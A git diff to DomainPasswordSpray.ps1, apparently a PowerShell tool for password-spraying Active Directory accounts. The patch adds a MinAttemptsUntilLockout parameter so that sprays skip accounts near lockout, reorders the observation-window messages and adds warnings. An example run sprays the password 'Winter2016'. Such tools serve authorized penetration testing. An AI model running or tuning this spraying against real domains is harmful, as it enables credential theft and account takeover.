diff --git a/DomainPasswordSpray.ps1 b/DomainPasswordSpray.ps1 index 3395c47..8840398 100644 --- a/DomainPasswordSpray.ps1 +++ b/DomainPasswordSpray.ps1 @@ -46,6 +46,10 @@ function Invoke-DomainPasswordSpray{ For each user, will try that user's name as their password + .PARAMETER MinAttemptsUntilLockout + + Limit password spraying to accounts with more than this number of attempts left until lockout. Default is 2 (if set to 1, a wrong attempt will lock the account!). + .EXAMPLE C:\PS> Invoke-DomainPasswordSpray -Password Winter2016 @@ -109,7 +113,10 @@ function Invoke-DomainPasswordSpray{ $Delay=0, [Parameter(Position = 9, Mandatory = $false)] - $Jitter=0 + $Jitter=0, + + [Parameter(Position = 10, Mandatory = $false)] + $MinAttemptsUntilLockout = 2 ) @@ -155,7 +162,7 @@ function Invoke-DomainPasswordSpray{ if ($UserList -eq "") { - $UserListArray = Get-DomainUserList -Domain $Domain -RemoveDisabled -RemovePotentialLockouts -Filter $Filter + $UserListArray = Get-DomainUserList -Domain $Domain -RemoveDisabled -RemovePotentialLockouts -Filter $Filter -MinAttemptsUntilLockout $MinAttemptsUntilLockout } else { @@ -174,18 +181,16 @@ function Invoke-DomainPasswordSpray{ } } + + $observation_window = Get-ObservationWindow $CurrentDomain + Write-Host -ForegroundColor Yellow "[*] The domain password policy observation window is set to $observation_window minutes." - if ($Passwords.count -gt 1) - { + if ($Passwords.count -gt 1) { Write-Host -ForegroundColor Yellow "[*] WARNING - Be very careful not to lock out accounts with the password list option!" + Write-Host "[*] Setting a $observation_window minute wait in between sprays." } - $observation_window = Get-ObservationWindow $CurrentDomain - - Write-Host -ForegroundColor Yellow "[*] The domain password policy observation window is set to $observation_window minutes." - Write-Host "[*] Setting a $observation_window minute wait in between sprays." - # if no force flag is set we will ask if the user is sure they want to spray if (!$Force) { @@ -281,6 +286,10 @@ function Get-DomainUserList Custom LDAP filter for users, e.g. "(description=*admin*)" + .PARAMETER MinAttemptsUntilLockout + + Limit password spraying to accounts with more than this number of attempts left until lockout. Default is 2 (if set to 1, a wrong attempt will lock the account!). + .EXAMPLE PS C:\> Get-DomainUserList @@ -313,9 +322,16 @@ function Get-DomainUserList [Parameter(Position = 3, Mandatory = $false)] [string] - $Filter + $Filter, + + [Parameter(Position = 4, Mandatory = $false)] + $MinAttemptsUntilLockout = 2 ) + if($MinAttemptsUntilLockout -eq 1) { + Write-Host -ForegroundColor Red "[*] Warning! 'MinAttemptsUntilLockout' set to 1. This means the attack could target accounts which will be locked upon 1 bad attempt (the attempt you are about to perform)!" + } + try { if ($Domain -ne "") @@ -455,7 +471,7 @@ function Get-DomainUserList # if there is more than 1 attempt left before a user locks out # or if the time since the last failed login is greater than the domain # observation window add user to spray list - if (($timedifference -gt $observation_window) -or ($attemptsuntillockout -gt 1)) + if (($timedifference -gt $observation_window) -or ($attemptsuntillockout -ge $MinAttemptsUntilLockout)) { $UserListArray += $samaccountname } @@ -503,7 +519,10 @@ function Invoke-SpraySinglePassword $count = $UserListArray.count Write-Host "[*] Now trying password $Password against $count users. Current time is $($time.ToShortTimeString())" $curr_user = 0 - Write-Host -ForegroundColor Yellow "[*] Writing successes to $OutFile" + if ($OutFile -ne "") + { + Write-Host -ForegroundColor Yellow "[*] Writing successes to $OutFile" + } $RandNo = New-Object System.Random foreach ($User in $UserListArray)